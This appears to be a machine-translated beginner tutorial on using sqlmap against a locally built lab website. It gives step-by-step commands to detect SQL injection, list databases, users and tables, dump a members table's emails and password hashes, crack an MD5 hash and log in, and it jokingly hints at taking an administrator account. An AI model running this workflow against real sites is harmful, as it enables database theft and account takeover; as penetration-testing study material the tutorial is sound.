This article is only dedicated to the study of penetration test sqlmap small white, Daniel please bypass.
>
>
For network security personnel, mastering the use of penetration tools is an essential skill. However, a no-teacher led by the small white at the beginning of the study, do not know how to start penetration learning, so this article is intended to help these small white primer.
Sqlmap is a very powerful open source SQL Automation injection tool that can be used to detect and exploit SQL injection vulnerabilities. It is developed by the Python language, so running requires a Python environment to be installed.
Now that this article is a basic tutorial, the following are the basics of how to use the tools.
This tutorial is for sqlmap specific application cases, if you need to know more sqlmap information can access the official http://sqlmap.org, or cloud Knowledge http://drops.wooyun.org/tips/401 and http:// drops.wooyun.org/tips/143.
Test environment: Locally built web site with SQL injection point http://192.168.1.150
Note: Sqlmap is only used to detect and exploit the SQL injection point, and can not scan the site of the vulnerabilities, use the scan tool before using to clear the SQL injection point.
Tutorial Start:
First, detection of the injection point is available
<span style= "Font-family:microsoft yahei;font-size:14px;" >c:\python27\sqlmap>python sqlmap.py-u "http://192.168.1.150/products.asp?id=134" </span>
Parameters:
-U: Specify the injection point URL
Results:
Injection results show:
(1) The injection parameter ID is get injection, the injection type has four kinds: boolean-based blind, error-based, stacked queries, inine query.
(2) Web Server System for Windows 2003 or XP
(3) Web application Technology: ASP. NET, Microsoft IIS 6.0
(4) database type: SQL Server 2000
There are several query statements in figure A, need user input [y/n], if you are too lazy to input or do not know how to input can let the program automatically input, just add a parameter, command as follows:
<span style= "Font-family:microsoft yahei;font-size:14px;" >c:\python27\sqlmap>python sqlmap.py-u "http://192.168.1.150/products.asp?id=134"--batch</span>
Second, Bauku
A single command exposes all database names in the SQL Server command as follows:
<span style= "Font-family:microsoft yahei;font-size:14px;" >c:\python27\sqlmap>python sqlmap.py-u "http://192.168.1.150/products.asp?id=134"--dbs</span>
Parameters:
There are two bars in front of the--dbs:dbs, please see clearly.
Results:
The results show that SQL Server contains 7 databases that are available.
Third, the database currently used by the Web
<span style= "Font-family:microsoft yahei;font-size:14px;" >c:\python27\sqlmap>python sqlmap.py-u "http://192.168.1.150/products.asp?id=134"--current-db</span>
Iv. use of the Web database account
<span style= "Font-family:microsoft yahei;font-size:14px;" >c:\python27\sqlmap>python sqlmap.py-u "http://192.168.1.150/products.asp?id=134"--current-user</span >
V. List all users of SQL Server
<span style= "Font-family:microsoft yahei;font-size:14px;" >c:\python27\sqlmap>python sqlmap.py-u "http://192.168.1.150/products.asp?id=134"--users</span>
Vi. Database account and password
<span style= "Font-family:microsoft yahei;font-size:14px;" >c:\python27\sqlmap>python sqlmap.py-u "http://192.168.1.150/products.asp?id=134"--passwords</span>
Vii. listing tables in a database
<span style= "Font-family:microsoft yahei;font-size:14px;" >c:\python27\sqlmap>python sqlmap.py-u "http://192.168.1.150/products.asp?id=134"-D tourdata--tables</ Span>
Parameters:
-D: Specify the database name
--tables: List Tables
Results:
The results reflect a total of 34 tables.
Viii. listing fields in a table
<span style= "Font-family:microsoft yahei;font-size:14px;" >c:\python27\sqlmap>python sqlmap.py-u "http://192.168.1.150/products.asp?id=134"-D tourdata-t UserB-- Columns</span>
Parameters:
-D: Specify the database name
-T: Specify a table to list fields
--columns: Specify list fields
Results:
The results show that the UserB table contains 23 fields.
Nine, the Storm field content
<span style= "Font-family:microsoft yahei;font-size:14px;" >c:\python27\sqlmap>python sqlmap.py-u "http://192.168.1.150/products.asp?id=134"-D tourdata-t userb-c "email , Username,userpassword "--dump</span>
Parameters:
-C: Specify the field to be burst
--dump: Export the results
Results:
If the field is too much, it takes a lot of time. You can specify the export of a specific range of field content, with the following command:
<span style= "Font-family:microsoft yahei;font-size:14px;" >c:\python27\sqlmap>python sqlmap.py-u "http://192.168.1.150/products.asp?id=134"-D tourdata-t userb-c "email , Username,userpassword "--start 1--stop--dump</span>
Parameters:
--start: Specifies the starting line
--stop: Specifies the end of the line
The meaning of this command is: Export the data contents of rows 1th through 10th in the field (Email,username,userpassword) in table UserB in database Tourdata.
The results are as follows:
X. Verification of results
One of the user information that you see through the results is:
Email:[email protected]
Username:1.asp
password:49ba59abbe56e057
By MD5 decryption, the original password to get the hash is: 123456
Get the account password we will test whether you can log in, the results are as follows:
Verify success!
Of course, we just get the ordinary member account to log in, you can also get the Administrator account to log in, behind the things to play it, hey!
Penetration Testing Tools Sqlmap Basic Tutorials